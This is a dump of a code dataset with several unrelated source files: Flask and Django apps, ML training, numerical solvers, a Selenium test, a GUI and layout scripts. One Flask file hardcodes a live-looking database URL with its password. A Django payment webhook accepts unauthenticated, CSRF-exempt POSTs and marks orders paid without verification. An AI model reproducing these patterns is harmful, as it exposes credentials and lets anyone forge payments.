getCaseIndex(x2+1, y1, map)\n P[(case1, case2)] = []\n for x3 in robustRange(x1, x2):\n P[(case1, case2)].append(getCaseIndex(x3+1, y1, map))\n for y2 in range(height):\n case1 = getCaseIndex(x1+1, y1, map)\n case2 = getCaseIndex(x1+1, y2, map)\n P[(case1, case2)] = []\n for y3 in robustRange(y1, y2):\n P[(case1, case2)].append(getCaseIndex(x1+1, y3, map))\n return P\n\ndef robustRange(x1, x2):#fini\n if (x1 > x2):\n return range(x2, x1+1)\n else:\n return range(x1, x2+1)\n\n#import time\n#start = time.clock()\n#\n#import reader\n#test = \"puzzles/test/test4.text\"\n#deb = \"puzzles/débutant/jam1.txt\"\n#map = reader.read(\"puzzles/expert/jam40.txt\")\n#solve(map, 3, True, False)\n#print(time.clock() - start)","sub_path":"pl.py","file_name":"pl.py","file_ext":"py","file_size_in_byte":12356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"4148693","text":"from sqlalchemy import Column, String, create_engine, Integer, Date\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import date\nimport json\nimport os\n\n\ndatabase_path = \"postgres://qmuctnxsjzynmq:caaa92f73f104bc8eaf93ab5b71a13adec2d14616f4eac78575a109a0a6e4896@ec2-52-70-67-123.compute-1.amazonaws.com:5432/d5o744grfo2435\"\n# database_path = \"postgres:///m_db\"\ndb = SQLAlchemy()\n\n\ndef setup_db(app, database_path=database_path):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_path\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n db.init_app(app)\n # db.create_all()\n\n# def db_insert_all():\n# db.drop_all()\n# db.create_all()\n# add_actor = Actor('atheer', 'Female', '20')\n# add_movie = Movie('hloe word ', date.today())\n# add_actor.insert()\n# add_movie.insert()\n# db.session.commit()\n\n'''\nActor\n'''\n\nclass Actor(db.Model):\n __tablename__ = 'actors'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n age = Column(Integer)\n gender = Column(String)\n\n def __init__(self, name, gender, age):\n self.name = name\n self.age = age\n self.gender = gender\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'age': self.age,\n 'gender': self.gender}\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n'''\nMovie\n'''\n\nclass Movie(db.Model):\n __tablename__ = 'movies'\n\n id = Column(Integer, primary_key=True)\n title = Column(String)\n release_date = Column(Date)\n\n def __init__(self, title, release_date):\n self.title = title\n self.release_date = release_date\n\n def format(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'release_date': self.release_date}\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n","sub_path":" Capstone_Project_udacity_V.2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"67518940","text":"# -*- coding: utf-8 -*-\r\n\r\nimport finicityapi.models.birthday\r\n\r\nclass CreateConsumerRequest(object):\r\n\r\n \"\"\"Implementation of the 'CreateConsumerRequest' model.\r\n\r\n TODO: type model description here.\r\n\r\n Attributes:\r\n first_name (string): The consumer first name(s) / given name(s)\r\n last_name (string): The consumer last name(s) / surname(s)\r\n address (string): The consumer’s street address\r\n city (string): The consumer’s city\r\n state (string): The consumer’s state\r\n zip (string): The consumer’s ZIP code\r\n phone (string): The consumer’s phone number\r\n ssn (string): The consumer’s 9-digit Social Security number (may\r\n include separators: nnn-nn-nnnn)\r\n birthday (Birthday): The consumer birth date\r\n email (string): The consumer’s email address\r\n suffix (string): The consumer suffix\r\n email_address (string): The consumer’s email address\r\n\r\n \"\"\"\r\n\r\n # Create a mapping from Model property names to API property names\r\n _names = {\r\n \"first_name\":'firstName',\r\n \"last_name\":'lastName',\r\n \"address\":'address',\r\n \"city\":'city',\r\n \"state\":'state',\r\n \"zip\":'zip',\r\n \"phone\":'phone',\r\n \"ssn\":'ssn',\r\n \"birthday\":'birthday',\r\n \"email_address\":'emailAddress',\r\n \"email\":'email',\r\n \"suffix\":'suffix'\r\n }\r\n\r\n def __init__(self,\r\n first_name=None,\r\n last_name=None,\r\n address=None,\r\n city=None,\r\n state=None,\r\n zip=None,\r\n phone=None,\r\n ssn=None,\r\n birthday=None,\r\n email_address=None,\r\n email=None,\r\n suffix=None,\r\n additional_properties = {}):\r\n \"\"\"Constructor for the CreateConsumerRequest class\"\"\"\r\n\r\n # Initialize members of the class\r\n self.first_name = first_name\r\n self.last_name = last_name\r\n self.address = address\r\n self.city = city\r\n self.state = state\r\n self.zip = zip\r\n self.phone = phone\r\n self.ssn = ssn\r\n self.birthday = birthday\r\n self.email = email\r\n self.suffix = suffix\r\n self.email_address = email_address\r\n\r\n # Add additional model properties to the instance\r\n self.additional_properties = additional_properties\r\n\r\n\r\n @classmethod\r\n def from_dictionary(cls,\r\n dictionary):\r\n \"\"\"Creates an instance of this model from a dictionary\r\n\r\n Args:\r\n dictionary (dictionary): A dictionary representation of the object as\r\n obtained from the deserialization of the server's response. The keys\r\n MUST match property names in the API description.\r\n\r\n Returns:\r\n object: An instance of this structure class.\r\n\r\n \"\"\"\r\n if dictionary is None:\r\n return None\r\n\r\n # Extract variables from the dictionary\r\n first_name = dictionary.get('firstName')\r\n last_name = dictionary.get('lastName')\r\n address = dictionary.get('address')\r\n city = dictionary.get('city')\r\n state = dictionary.get('state')\r\n zip = dictionary.get('zip')\r\n phone = dictionary.get('phone')\r\n ssn = dictionary.get('ssn')\r\n birthday = finicityapi.models.birthday.Birthday.from_dictionary(dictionary.get('birthday')) if dictionary.get('birthday') else None\r\n email_address = dictionary.get('emailAddress')\r\n email = dictionary.get('email')\r\n suffix = dictionary.get('suffix')\r\n\r\n # Clean out expected properties from dictionary\r\n for key in cls._names.values():\r\n if key in dictionary:\r\n del dictionary[key]\r\n\r\n # Return an object of this model\r\n return cls(first_name,\r\n last_name,\r\n address,\r\n city,\r\n state,\r\n zip,\r\n phone,\r\n ssn,\r\n birthday,\r\n email_address,\r\n email,\r\n suffix,\r\n dictionary)\r\n\r\n\r\n","sub_path":"finicityapi/models/create_consumer_request.py","file_name":"create_consumer_request.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"155093598","text":"import numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.optimizers import Adam\nfrom keras.utils import np_utils\nfrom sklearn import metrics\nfrom sklearn.metrics import precision_score, recall_score, confusion_matrix, classification_report, accuracy_score, \\\n f1_score\nfrom keras.callbacks import LearningRateScheduler\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef dnn(X, val_x, y, val_y):\n num_labels = y.shape[1]\n\n # build model\n model = Sequential()\n model.add(Dense(512, input_shape=(40,)))\n model.add(Activation('relu'))\n model.add(Dropout(0.3))\n\n model.add(Dense(256))\n model.add(Activation('relu'))\n model.add(Dropout(0.3))\n\n model.add(Dense(num_labels))\n model.add(Activation('softmax'))\n\n model.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')\n\n model.fit(X, y, batch_size=256, epochs=5000, validation_data=(val_x, val_y))\n\n\ndef dnns(X, val_x, y, val_y):\n num_labels = y.shape[1]\n nets = 5\n\n model = [0] * nets\n # model = [0 for k in range(5)]\n\n # build model\n for net in range(nets):\n model[net] = Sequential()\n\n model[net].add(Dense(512, input_shape=(40,)))\n model[net].add(Activation('relu'))\n model[net].add(Dropout(0.45))\n\n model[net].add(Dense(256))\n model[net].add(Activation('relu'))\n model[net].add(Dropout(0.45))\n\n model[net].add(Dense(num_labels))\n model[net].add(Activation('softmax'))\n\n model[net].compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='RMSprop')\n\n # 训练网络\n history = [0] * nets\n epochs = 132\n for j in range(nets):\n X_train2, X_val2, Y_train2, Y_val2 = X, val_x, y, val_y\n history[j] = model[j].fit(X, Y_train2, batch_size=256,\n epochs=epochs,\n validation_data=(X_val2, Y_val2), verbose=0)\n # score = model[j].evaluate(X_val2, Y_val2, batch_size=256)\n # print(\"processing model # \"+str(j) + \" _ \" + str(score))\n # for key in history[j].history.keys():\n # print(key)\n\n print(\"DNN {0:d}: Epochs={1:d}, Train accuracy={2:.5f}, Validation accuracy={3:.5f}\".format(\n j + 1, epochs, max(history[j].history['accuracy']), max(history[j].history['val_accuracy'])))\n\n\n return model,history,nets\n\ndef process_show(history,nets):\n # 图示训练过程\n net = -1\n name_title = ['Loss', 'Accuracy']\n fig = plt.figure(figsize=(64, 64))\n for j in range(nets):\n for i in range(0, 2):\n ax = fig.add_subplot(8, 8, i + 1)\n plt.plot(history[j].history[list(history[j].history.keys())[i]],\n label=list(history[j].history.keys())[i])\n plt.plot(history[j].history[list(history[j].history.keys())[i + 2]],\n label=list(history[j].history.keys())[i + 2])\n plt.xlabel('Epochs', fontsize=18)\n plt.ylabel(name_title[i], fontsize=18)\n plt.legend()\n plt.show()\n\n# 定义评价指标\ndef acc(y_test, prediction):\n ### PRINTING ACCURACY OF PREDICTION\n ### RECALL\n ### PRECISION\n ### CLASIFICATION REPORT\n ### CONFUSION MATRIX\n cm = confusion_matrix(y_test, prediction)\n recall = np.diag(cm) / np.sum(cm, axis=1)\n precision = np.diag(cm) / np.sum(cm, axis=0)\n\n print('Recall:', recall)\n print('Precision:', precision)\n print('\\n clasification report:\\n', classification_report(y_test, prediction))\n print('\\n confussion matrix:\\n', confusion_matrix(y_test, prediction))\n\n ax = sns.heatmap(confusion_matrix(y_test, prediction), linewidths=0.5, cmap=\"YlGnBu\")","sub_path":"AC_TAU/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"445439791","text":"\"\"\"\nApproach: Try to find the pattern and repeated sub-problems to use DP.\n\nsee that just by applied the decision making logic on the given array would be difficult. Try to check if this pattern\ncan be changed. One way would be to modify the array such that the indices of the new array go from 0 to max element of\nthe given array. Then you store the sum of same valued elements from the given array onto the respective indices.\n\n\"\"\"\n\nclass Solution:\n def deleteAndEarn(self, nums: List[int]) -> int:\n simplified = [0 ] *(max(nums ) +1)\n for i in (nums):\n simplified[i] += i\n\n # Approach 1:\n \"\"\"\n return self.helper(simplified, 0, 0)\n\n def helper(self, nums, index, earned):\n #base\n if index >= len(nums):\n return earned\n\n #choose to delete:\n case0 = self.helper(nums, index + 2, earned + nums[index])\n\n # choose not to delete:\n case1 = self.helper(nums, index + 1, earned)\n\n return max(case0, case1)\n \"\"\"\n dp = [[0 ] *2 for _ in range(len(simplified))]\n dp[0][1] = simplified[0]\n\n for i in range(len(simplified)):\n dp[i][0] = max(dp[ i -1][0], dp[ i -1][1])\n dp[i][1] = dp[ i -1][0] + simplified[i]\n return max(dp[-1])\n\"\"\"\nApproach 1:\nTC: O(2^n)\nSC: O(n)\nApproach 2:\nTC: O(n)\nSC: O(n)\n\"\"\"","sub_path":"Problem-1.py","file_name":"Problem-1.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"489072453","text":"import datetime\nfrom Myshop.settings import YANDEX_ID, YANDEX_KEY, TEST_YANDEX_ID, TEST_YANDEX_KEY, RUSSIAN_POST_TOKEN, RUSSIAN_POST_KEY\n\nfrom django.core.mail import send_mail, EmailMessage\nfrom django.shortcuts import render, redirect\nfrom rest_framework.authentication import SessionAuthentication\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.views import APIView\n\nfrom orders.models import Order, OrderItem\nfrom yandex_checkout import Payment, Configuration\n\nfrom shop.models import Flavour\n\nimport json\nimport requests\nfrom django.http import HttpResponse\n\n\ndef payment_process(*args, order_id):\n Configuration.account_id = YANDEX_ID\n Configuration.secret_key = YANDEX_KEY\n # Configuration.account_id = TEST_YANDEX_ID\n # Configuration.secret_key = TEST_YANDEX_KEY\n order = Order.published.get(id=order_id)\n value = float(order.get_total_cost() + order.deliver_cost)\n\n json_yandex = {\n \"amount\": {\n \"value\": value,\n \"currency\": \"RUB\"\n },\n \"description\": 'Номер заказа: {} от {}'.format(order.id, order.created.date()),\n \"metadata\": {\n \"order_id\": order.id\n },\n \"capture\": True,\n \"confirmation\": {\n \"type\": \"redirect\",\n \"return_url\": \"https://mrpit.online\"\n },\n \"receipt\": {\n \"customer\": {\n \"full_name\": order.client.username,\n \"email\": order.email,\n \"phone\": order.phone\n },\n \"items\": [\n ]\n },\n }\n items = order.items.all()\n for item in items:\n item = {\n \"description\": item.flavour.product,\n \"quantity\": item.quantity,\n \"amount\": {\n \"value\": item.price,\n \"currency\": \"RUB\"\n },\n \"vat_code\": \"2\",\n \"payment_mode\": \"full_prepayment\",\n \"payment_subject\": \"commodity\"\n }\n json_yandex[\"receipt\"][\"items\"].append(item)\n delivery_item = {\n \"description\": \"Доставка\",\n \"quantity\": \"1\",\n \"amount\": {\n \"value\": order.deliver_cost,\n \"currency\": \"RUB\"\n },\n \"vat_code\": \"2\",\n \"payment_mode\": \"full_prepayment\",\n \"payment_subject\": \"commodity\"\n }\n json_yandex[\"receipt\"][\"items\"].append(delivery_item)\n\n payment = Payment.create(json_yandex)\n\n return redirect(payment.confirmation.confirmation_url)\n\n\nclass CsrfExemptSessionAuthentication(SessionAuthentication):\n def enforce_csrf(self, request):\n return None\n\n\nclass YandexNotifications(APIView):\n permission_classes = [AllowAny]\n authentication_classes = (CsrfExemptSessionAuthentication,)\n\n def post(self, request):\n event_json = json.loads(request.body)\n if event_json[\"event\"] == \"payment.succeeded\":\n order_id = int(event_json[\"object\"][\"metadata\"][\"order_id\"])\n order = Order.published.get(id=order_id)\n order.paid = True\n order.status = \"В работе\"\n order.save()\n # Отправляем письмо администрации об оплате заказа\n subject_pay = 'Заказ №{} оплачен!'.format(order.id)\n mail_from = 'no-reply@mrpit.online'\n mail_to = ['admin@mrpit.online', 'nukez@inbox.ru']\n admin_message = 'Заказ №{} оплачен!
'\\\n 'Перейти в админку по ссылке'.format(order.id)\n mail = EmailMessage(subject_pay, admin_message, mail_from, mail_to)\n mail.content_subtype = \"html\"\n mail.send()\n\n for item in order.items.all():\n flavour = Flavour.published.get(id=item.flavour.id)\n if flavour.quantity > 0:\n flavour.quantity -= item.quantity\n if flavour.quantity == 0:\n flavour.for_offer = False\n # Отправка письма администрации о том, что товар из набора кончился и нужно формировать новый\n subject = 'Закончился вкус у товара'\n sender = 'no-reply@mrpit.online'\n message = 'Закончился вкус у товара. {} {}\\n' \\\n 'Необходимо проверить, есть ли товар в наборе и при необходимости переформировать' \\\n .format(flavour.name, flavour.product.name)\n send_mail(subject, message, sender, ['admin@mrpit.online'])\n else:\n flavour.quantity = 0\n\n flavour.save()\n # Если доставка в регионы, то создаём отправление в лк почты россии\n if order.city != 'Пермь':\n russian_post_create_delivery(order_id)\n return HttpResponse(status=200)\n elif event_json[\"event\"] == \"payment.waiting_for_capture\":\n return HttpResponse(status=200)\n else:\n return HttpResponse(status=500)\n\n\ndef russian_post_create_delivery(order_id):\n order = Order.published.get(id=order_id)\n\n\n protocol = \"https://\"\n host = \"otpravka-api.pochta.ru\"\n token = RUSSIAN_POST_TOKEN\n key = RUSSIAN_POST_KEY\n\n request_headers = {\n \"Content-Type\": \"application/json\",\n \"Accept\": \"application/json;charset=UTF-8\",\n \"Authorization\": \"AccessToken \" + token,\n \"X-User-Authorization\": \"Basic \" + key\n }\n\n path = \"/1.0/user/backlog\"\n\n new_orders = [{\n \"postoffice-code\": \"614961\",\n \"tel-address\": order.phone,\n \"surname\": order.last_name,\n \"given-name\": order.first_name,\n \"mail-direct\": 643,\n \"address-type-to\": \"DEFAULT\",\n \"index-to\": order.postal_code,\n \"region-to\": \"Заполнить регион!\",\n \"place-to\": order.city,\n \"street-to\": order.address,\n \"house-to\": \"Заполнить номер дома и кв!\",\n \"mass\": order.total_mass,\n \"mail-category\": \"ORDINARY\",\n \"mail-type\": \"ONLINE_PARCEL\",\n \"order-num\": order.id\n }]\n\n url = protocol + host + path\n\n requests.put(url, headers=request_headers, data=json.dumps(new_orders))\n\n","sub_path":"payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167704443","text":"#table number 1 and 2 !!!!!!\n\nimport pandas as pd\nimport psycopg2\nimport datetime\nconnection = psycopg2.connect(user=\"postgres\", password=\"barmej\", host=\"127.0.0.1\", port=\"5432\", database=\"imdb_database\")\n\ncursor = connection.cursor()\n\ncursor.execute(\"SELECT label_name, label_id FROM label_types\")\nresult1 = cursor.fetchall()\nlabels = dict(result1)\nlabels\n\ndata = pd.read_csv('IMDB_Dataset.csv')\ndata.insert(0, 'id', range(1,1+len(data)))\ndata.insert(3, 'date', datetime.datetime.now().replace(microsecond=0))\n\ndata['sentiment']=[labels[x] for x in data['sentiment']]\n\nfor i,row in data.iterrows():\n\trow_ = tuple(row)\n\tsql1 = \"INSERT INTO data_input4 (id, input_data, input_date) VALUES (%s,%s,%s)\"\n\tcursor.execute(sql1, (row['id'],row['review'],datetime.datetime.now()))\n\tsql2 = \"INSERT INTO data_labeling5 (id_label, Label_number,Label_date) VALUES (%s,%s,%s)\"\n\tcursor.execute(sql2,(row['id'],row['sentiment'],datetime.datetime.now()))\n\tconnection.commit()\n","sub_path":"project_9_try11.py","file_name":"project_9_try11.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"90739882","text":"#!/usr/bin/env pyhton\n\nimport numpy as np\nimport poisson2D\nimport time\n\nimport matplotlib.pyplot as plt\n\nfilename = input('Nombre del archivo:')\nk = poisson2D.leeImagen(filename,0.01)\n\nax = 0.0\nbx = 1.0\nay = 0.0\nby = 1.0\nNx = k.shape[0]-2\nNy = k.shape[1]-2\nboundA = -1\nboundB = -1\nboundC = 1\nboundD = 1\n\n#k = np.ones([Nx+2,Ny+2])\n## Calcula Delta x y Delta y\nhx = (bx-ax)/(Nx+1)\nhy = (by-ay)/(Ny+1)\n\nht = 1\nr = ht / (hx*hy)\n\npoisson2D.ImprimeDatos(ax,bx,ay,by,Nx,Ny,hx,hy,\n boundA,\"Dirichlet\",\n boundB,\"Dirichlet\",\n boundC,\"Dirichlet\",\n boundD,\"Dirichlet\")\n\n## Definicion del sistema lineal de N+1 x N+1\nf = np.zeros((Ny,Nx)) # RHS\nA = poisson2D.Laplaciano2D(Nx, Ny,1,k) # Matriz del sistema\n\n## Aplicacion de las condiciones de frontera Dirichlet\n\nf[Ny-1,: ] = boundB # Top wall\nf[0 ,: ] = boundA # Bot wall\nf[: ,0 ] = boundC # Left wall\nf[: ,Nx-1] = boundD # Right wall\n\n\n## La solucion sera guardada en el arreglo u, que es de tamanio Ny+2 x Nx+2, pues incluye las fronteras\nu = np.zeros((Ny+2, Nx+2))\n\n## Se utiliza un algoritmo del paquete linalg para obtener la solucion del sistema de N x N\nut = np.copy(u[1:Ny+1,1:Nx+1])\nut.shape = ut.size # Cambiamos los arreglos a formato unidimensional\nf.shape = f.size # Cambiamos los arreglos a formato unidimensional\n\nt1_start = time.perf_counter()\nut = np.linalg.solve(A,f)\nt1_stop = time.perf_counter()\nprint(time.ctime(), '\\n CPU time: {:0.6f} '.format(t1_stop-t1_start))\n\n## Los valores en los lados del dominio son conocidos debido a las cond. Dirichlet\nu[Ny+1,: ] = boundB # Top wall\nu[0 ,: ] = boundA # Bot wall\nu[: ,0 ] = boundC # Left wall\nu[: ,Nx+1] = boundD # Right wall\n\npoisson2D.ImprimeSistema(A,ut,f)\n\nut.shape = (Ny, Nx) # Regresamos el arreglo a formato bidimensional\nu[1:Ny+1,1:Nx+1] = ut\n\nx = np.linspace(ax,bx,Nx+2)\ny = np.linspace(ay,by,Ny+2)\nxg, yg = np.meshgrid(x,y)\n\npoisson2D.GuardaSolucion('imagenX', x, y, k)\n\nplt.imshow(u,cmap='inferno')\nplt.show()\n\n#poisson2D.GuardaSolucion('SALIDA', x, y, u)\n\n# Post-procesamiento ...\nNNX = u.shape[0]\nunew = np.copy(u)\nfor j in range(u.shape[0]):\n for i in range(u.shape[1]):\n unew[i,j] = u[NNX-i-1,j]\n\npoisson2D.GraficaSuperficieC(xg,yg,unew,'inferno') #hot, cool, rainbow, ...\n\n","sub_path":"TEST/2D_K_Variable_01.py","file_name":"2D_K_Variable_01.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"634470698","text":"# Import unittest module for creating unit tests\nimport unittest\n\n# Import time module to implement \nimport time\n\n# Import the Selenium 2 module (aka \"webdriver\")\nfrom selenium import webdriver\n\n# For automating data input\nfrom selenium.webdriver.common.keys import Keys\n\n# For providing custom configurations for Chrome to run\nfrom selenium.webdriver.chrome.options import Options\n\n\n# --------------------------------------\n# Provide a class for the unit test case\nclass PythonOrgSearchChrome(unittest.TestCase):\n\n\t# Anything declared in setUp will be executed for all test cases\n\tdef setUp(self):\n\t\t# Select which device you want to emulate by uncommenting it\n\t\t# More information at: https://sites.google.com/a/chromium.org/chromedriver/mobile-emulation\n\t\tmobile_emulation = { \n\t\t\t\"deviceName\": \"Nexus 5\"\n\t\t\t\n\t\t\t# Or specify a specific build using the following two arguments\n\t\t\t#\"deviceMetrics\": { \"width\": 360, \"height\": 640, \"pixelRatio\": 3.0 },\n\t\t #\"userAgent\": \"Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19\" }\n\t\t}\n\t\t\n\t\t# Define a variable to hold all the configurations we want\n\t\tchrome_options = webdriver.ChromeOptions()\n\t\t\n\t\t# Add the mobile emulation to the chrome options variable\n\t\tchrome_options.add_experimental_option(\"mobileEmulation\", mobile_emulation)\n\t\tchrome_options.add_argument('--headless')\n\n\t\t# Create driver, pass it the path to the chromedriver file and the special configurations you want to run\n\t\tself.driver = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver', chrome_options=chrome_options)\n\n\t# An individual test case. Must start with 'test_' (as per unittest module)\n\tdef test_search_in_python_chrome(self):\t\n\t\t# Assigning a local variable for the global driver\n\t\tdriver = self.driver\n\n\t\t# Go to google.com\n\n\t\tdriver.get('http://localhost:8080')\n\t\tdriver.implicitly_wait(30)\n\t\ttext = driver.find_element_by_id(\"sample-item\").text\n\t\t\n\t\tprint(\"Text:\",text)\n\t\tself.assertEqual(\"text in the item\", text)\n\n\n\t\t# Take a screenshot of the results\n\t# Anything declared in tearDown will be executed for all test cases\n\tdef tearDown(self):\n\t\t# Close the browser. \n\t\t# Note close() will close the current tab, if its the last tab it will close the browser. To close the browser entirely use quit()\n\t\tself.driver.close()\n\n# Boilerplate code to start the unit tests\nif __name__ == \"__main__\":\n\tunittest.main()\n","sub_path":"seltest.py","file_name":"seltest.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"502487829","text":"from tkinter import *\r\n\r\ndef doSome():\r\n print('wyświetlam tekst')\r\n\r\ndef doSome2():\r\n print('To jest druga funckcja')\r\n \r\nroot = Tk()\r\nroot.geometry('300x200')\r\n\r\n# -- MAIN MENU\r\n\r\nmenu_main = Menu(root)\r\n\r\nroot.config(menu=menu_main)\r\n\r\nsubmenu = Menu(menu_main)\r\neditmenu = Menu(menu_main)\r\n\r\n# -- dodanie menu\r\nmenu_main.add_cascade(label='File', menu=submenu)\r\nmenu_main.add_cascade(label='Edit', menu=editmenu)\r\n\r\nsubmenu.add_command(label='New project', command=doSome)\r\nsubmenu.add_command(label='New...', command=doSome2)\r\nsubmenu.add_separator()\r\nsubmenu.add_command(label='Exit', command=root.quit)\r\n\r\neditmenu.add_command(label='Redo', command=doSome)\r\n\r\n# -- TOOLBAR\r\n\r\ntoolbar = Frame(root, bg='yellow')\r\ntool_btn = Button(toolbar, text='Insert image', command=doSome)\r\ntool_print_btn = Button(toolbar, text='Print', command=doSome)\r\n\r\ntool_btn.pack(side=LEFT, padx=2, pady=2)\r\ntool_print_btn.pack(side=LEFT, padx=2, pady=2)\r\ntoolbar.pack(side=TOP, fill=X)\r\n\r\n# -- STATUS\r\n\r\nstatusbar = Label(root, text='Prepare', bd=1, relief=SUNKEN, anchor=W)\r\n\r\n\r\nstatusbar.pack(side=BOTTOM, fill=X)\r\n\r\n\r\n\r\nroot.mainloop()","sub_path":"Python_projekty_windows/Tkinter-gui/newgui.py","file_name":"newgui.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"256926159","text":"#!/usr/bin/python\n########################################################################################################################\n#\n# Copyright (c) 2014, Regents of the University of California\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the\n# following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following\n# disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the\n# following disclaimer in the documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n########################################################################################################################\n\n\"\"\"ADC library\n\"\"\"\nimport laygo\nimport numpy as np\nimport os\n#import logging;logging.basicConfig(level=logging.DEBUG)\n\ndef create_power_pin_from_inst(laygen, layer, gridname, inst_left, inst_right):\n \"\"\"create power pin\"\"\"\n rvdd0_pin_xy = laygen.get_inst_pin_coord(inst_left.name, 'VDD', gridname, sort=True)\n rvdd1_pin_xy = laygen.get_inst_pin_coord(inst_right.name, 'VDD', gridname, sort=True)\n rvss0_pin_xy = laygen.get_inst_pin_coord(inst_left.name, 'VSS', gridname, sort=True)\n rvss1_pin_xy = laygen.get_inst_pin_coord(inst_right.name, 'VSS', gridname, sort=True)\n\n laygen.pin(name='VDD', layer=layer, xy=np.vstack((rvdd0_pin_xy[0],rvdd1_pin_xy[1])), gridname=gridname)\n laygen.pin(name='VSS', layer=layer, xy=np.vstack((rvss0_pin_xy[0],rvss1_pin_xy[1])), gridname=gridname)\n\ndef generate_sarlogic(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m3m4, m=1, origin=np.array([0, 0])):\n \"\"\"generate sar logic \"\"\"\n pg = placement_grid\n rg_m3m4 = routing_grid_m3m4\n\n #inv_name = 'inv_' + str(m) + 'x'\n #oai22_name = 'oai22_' + str(m) + 'x'\n #mux2to1_name = 'mux2to1_' + str(m) + 'x'\n #nand_name = 'nand_' + str(m) + 'x'\n inv_name = 'inv_1x'\n oai22_name = 'oai22_1x'\n mux2to1_name = 'mux2to1_1x'\n nand_name = 'nand_1x'\n inv_obuf_name = 'inv_' + str(m) + 'x'\n\n # placement\n isaopb0 = laygen.place(name = \"I\" + objectname_pfix + 'INV0', templatename = inv_name,\n gridname = pg, xy=origin, template_libname=templib_logic)\n isaomb0 = laygen.relplace(name=\"I\" + objectname_pfix + 'INV1', templatename=inv_name,\n gridname=pg, refinstname=isaopb0.name, template_libname=templib_logic)\n ioai0 = laygen.relplace(name = \"I\" + objectname_pfix + 'OAI0', templatename = oai22_name,\n gridname = pg, refinstname = isaomb0.name, template_libname=templib_logic)\n ildpo0 = laygen.relplace(name=\"I\" + objectname_pfix + 'INV2', templatename=inv_name,\n gridname=pg, refinstname=ioai0.name, template_libname=templib_logic)\n ioai1 = laygen.relplace(name = \"I\" + objectname_pfix + 'OAI1', templatename = oai22_name,\n gridname = pg, refinstname = ildpo0.name, template_libname=templib_logic)\n ildno0 = laygen.relplace(name=\"I\" + objectname_pfix + 'INV3', templatename=inv_name,\n gridname=pg, refinstname=ioai1.name, template_libname=templib_logic)\n ind0 = laygen.relplace(name=\"I\" + objectname_pfix + 'ND0', templatename=nand_name,\n gridname=pg, refinstname=ildno0.name, template_libname=templib_logic)\n imuxen0 = laygen.relplace(name=\"I\" + objectname_pfix + 'MUXEN0', templatename=inv_name,\n gridname=pg, refinstname=ind0.name, template_libname=templib_logic)\n imux0 = laygen.relplace(name=\"I\" + objectname_pfix + 'MUX0', templatename=mux2to1_name,\n gridname=pg, refinstname=imuxen0.name, template_libname=templib_logic)\n 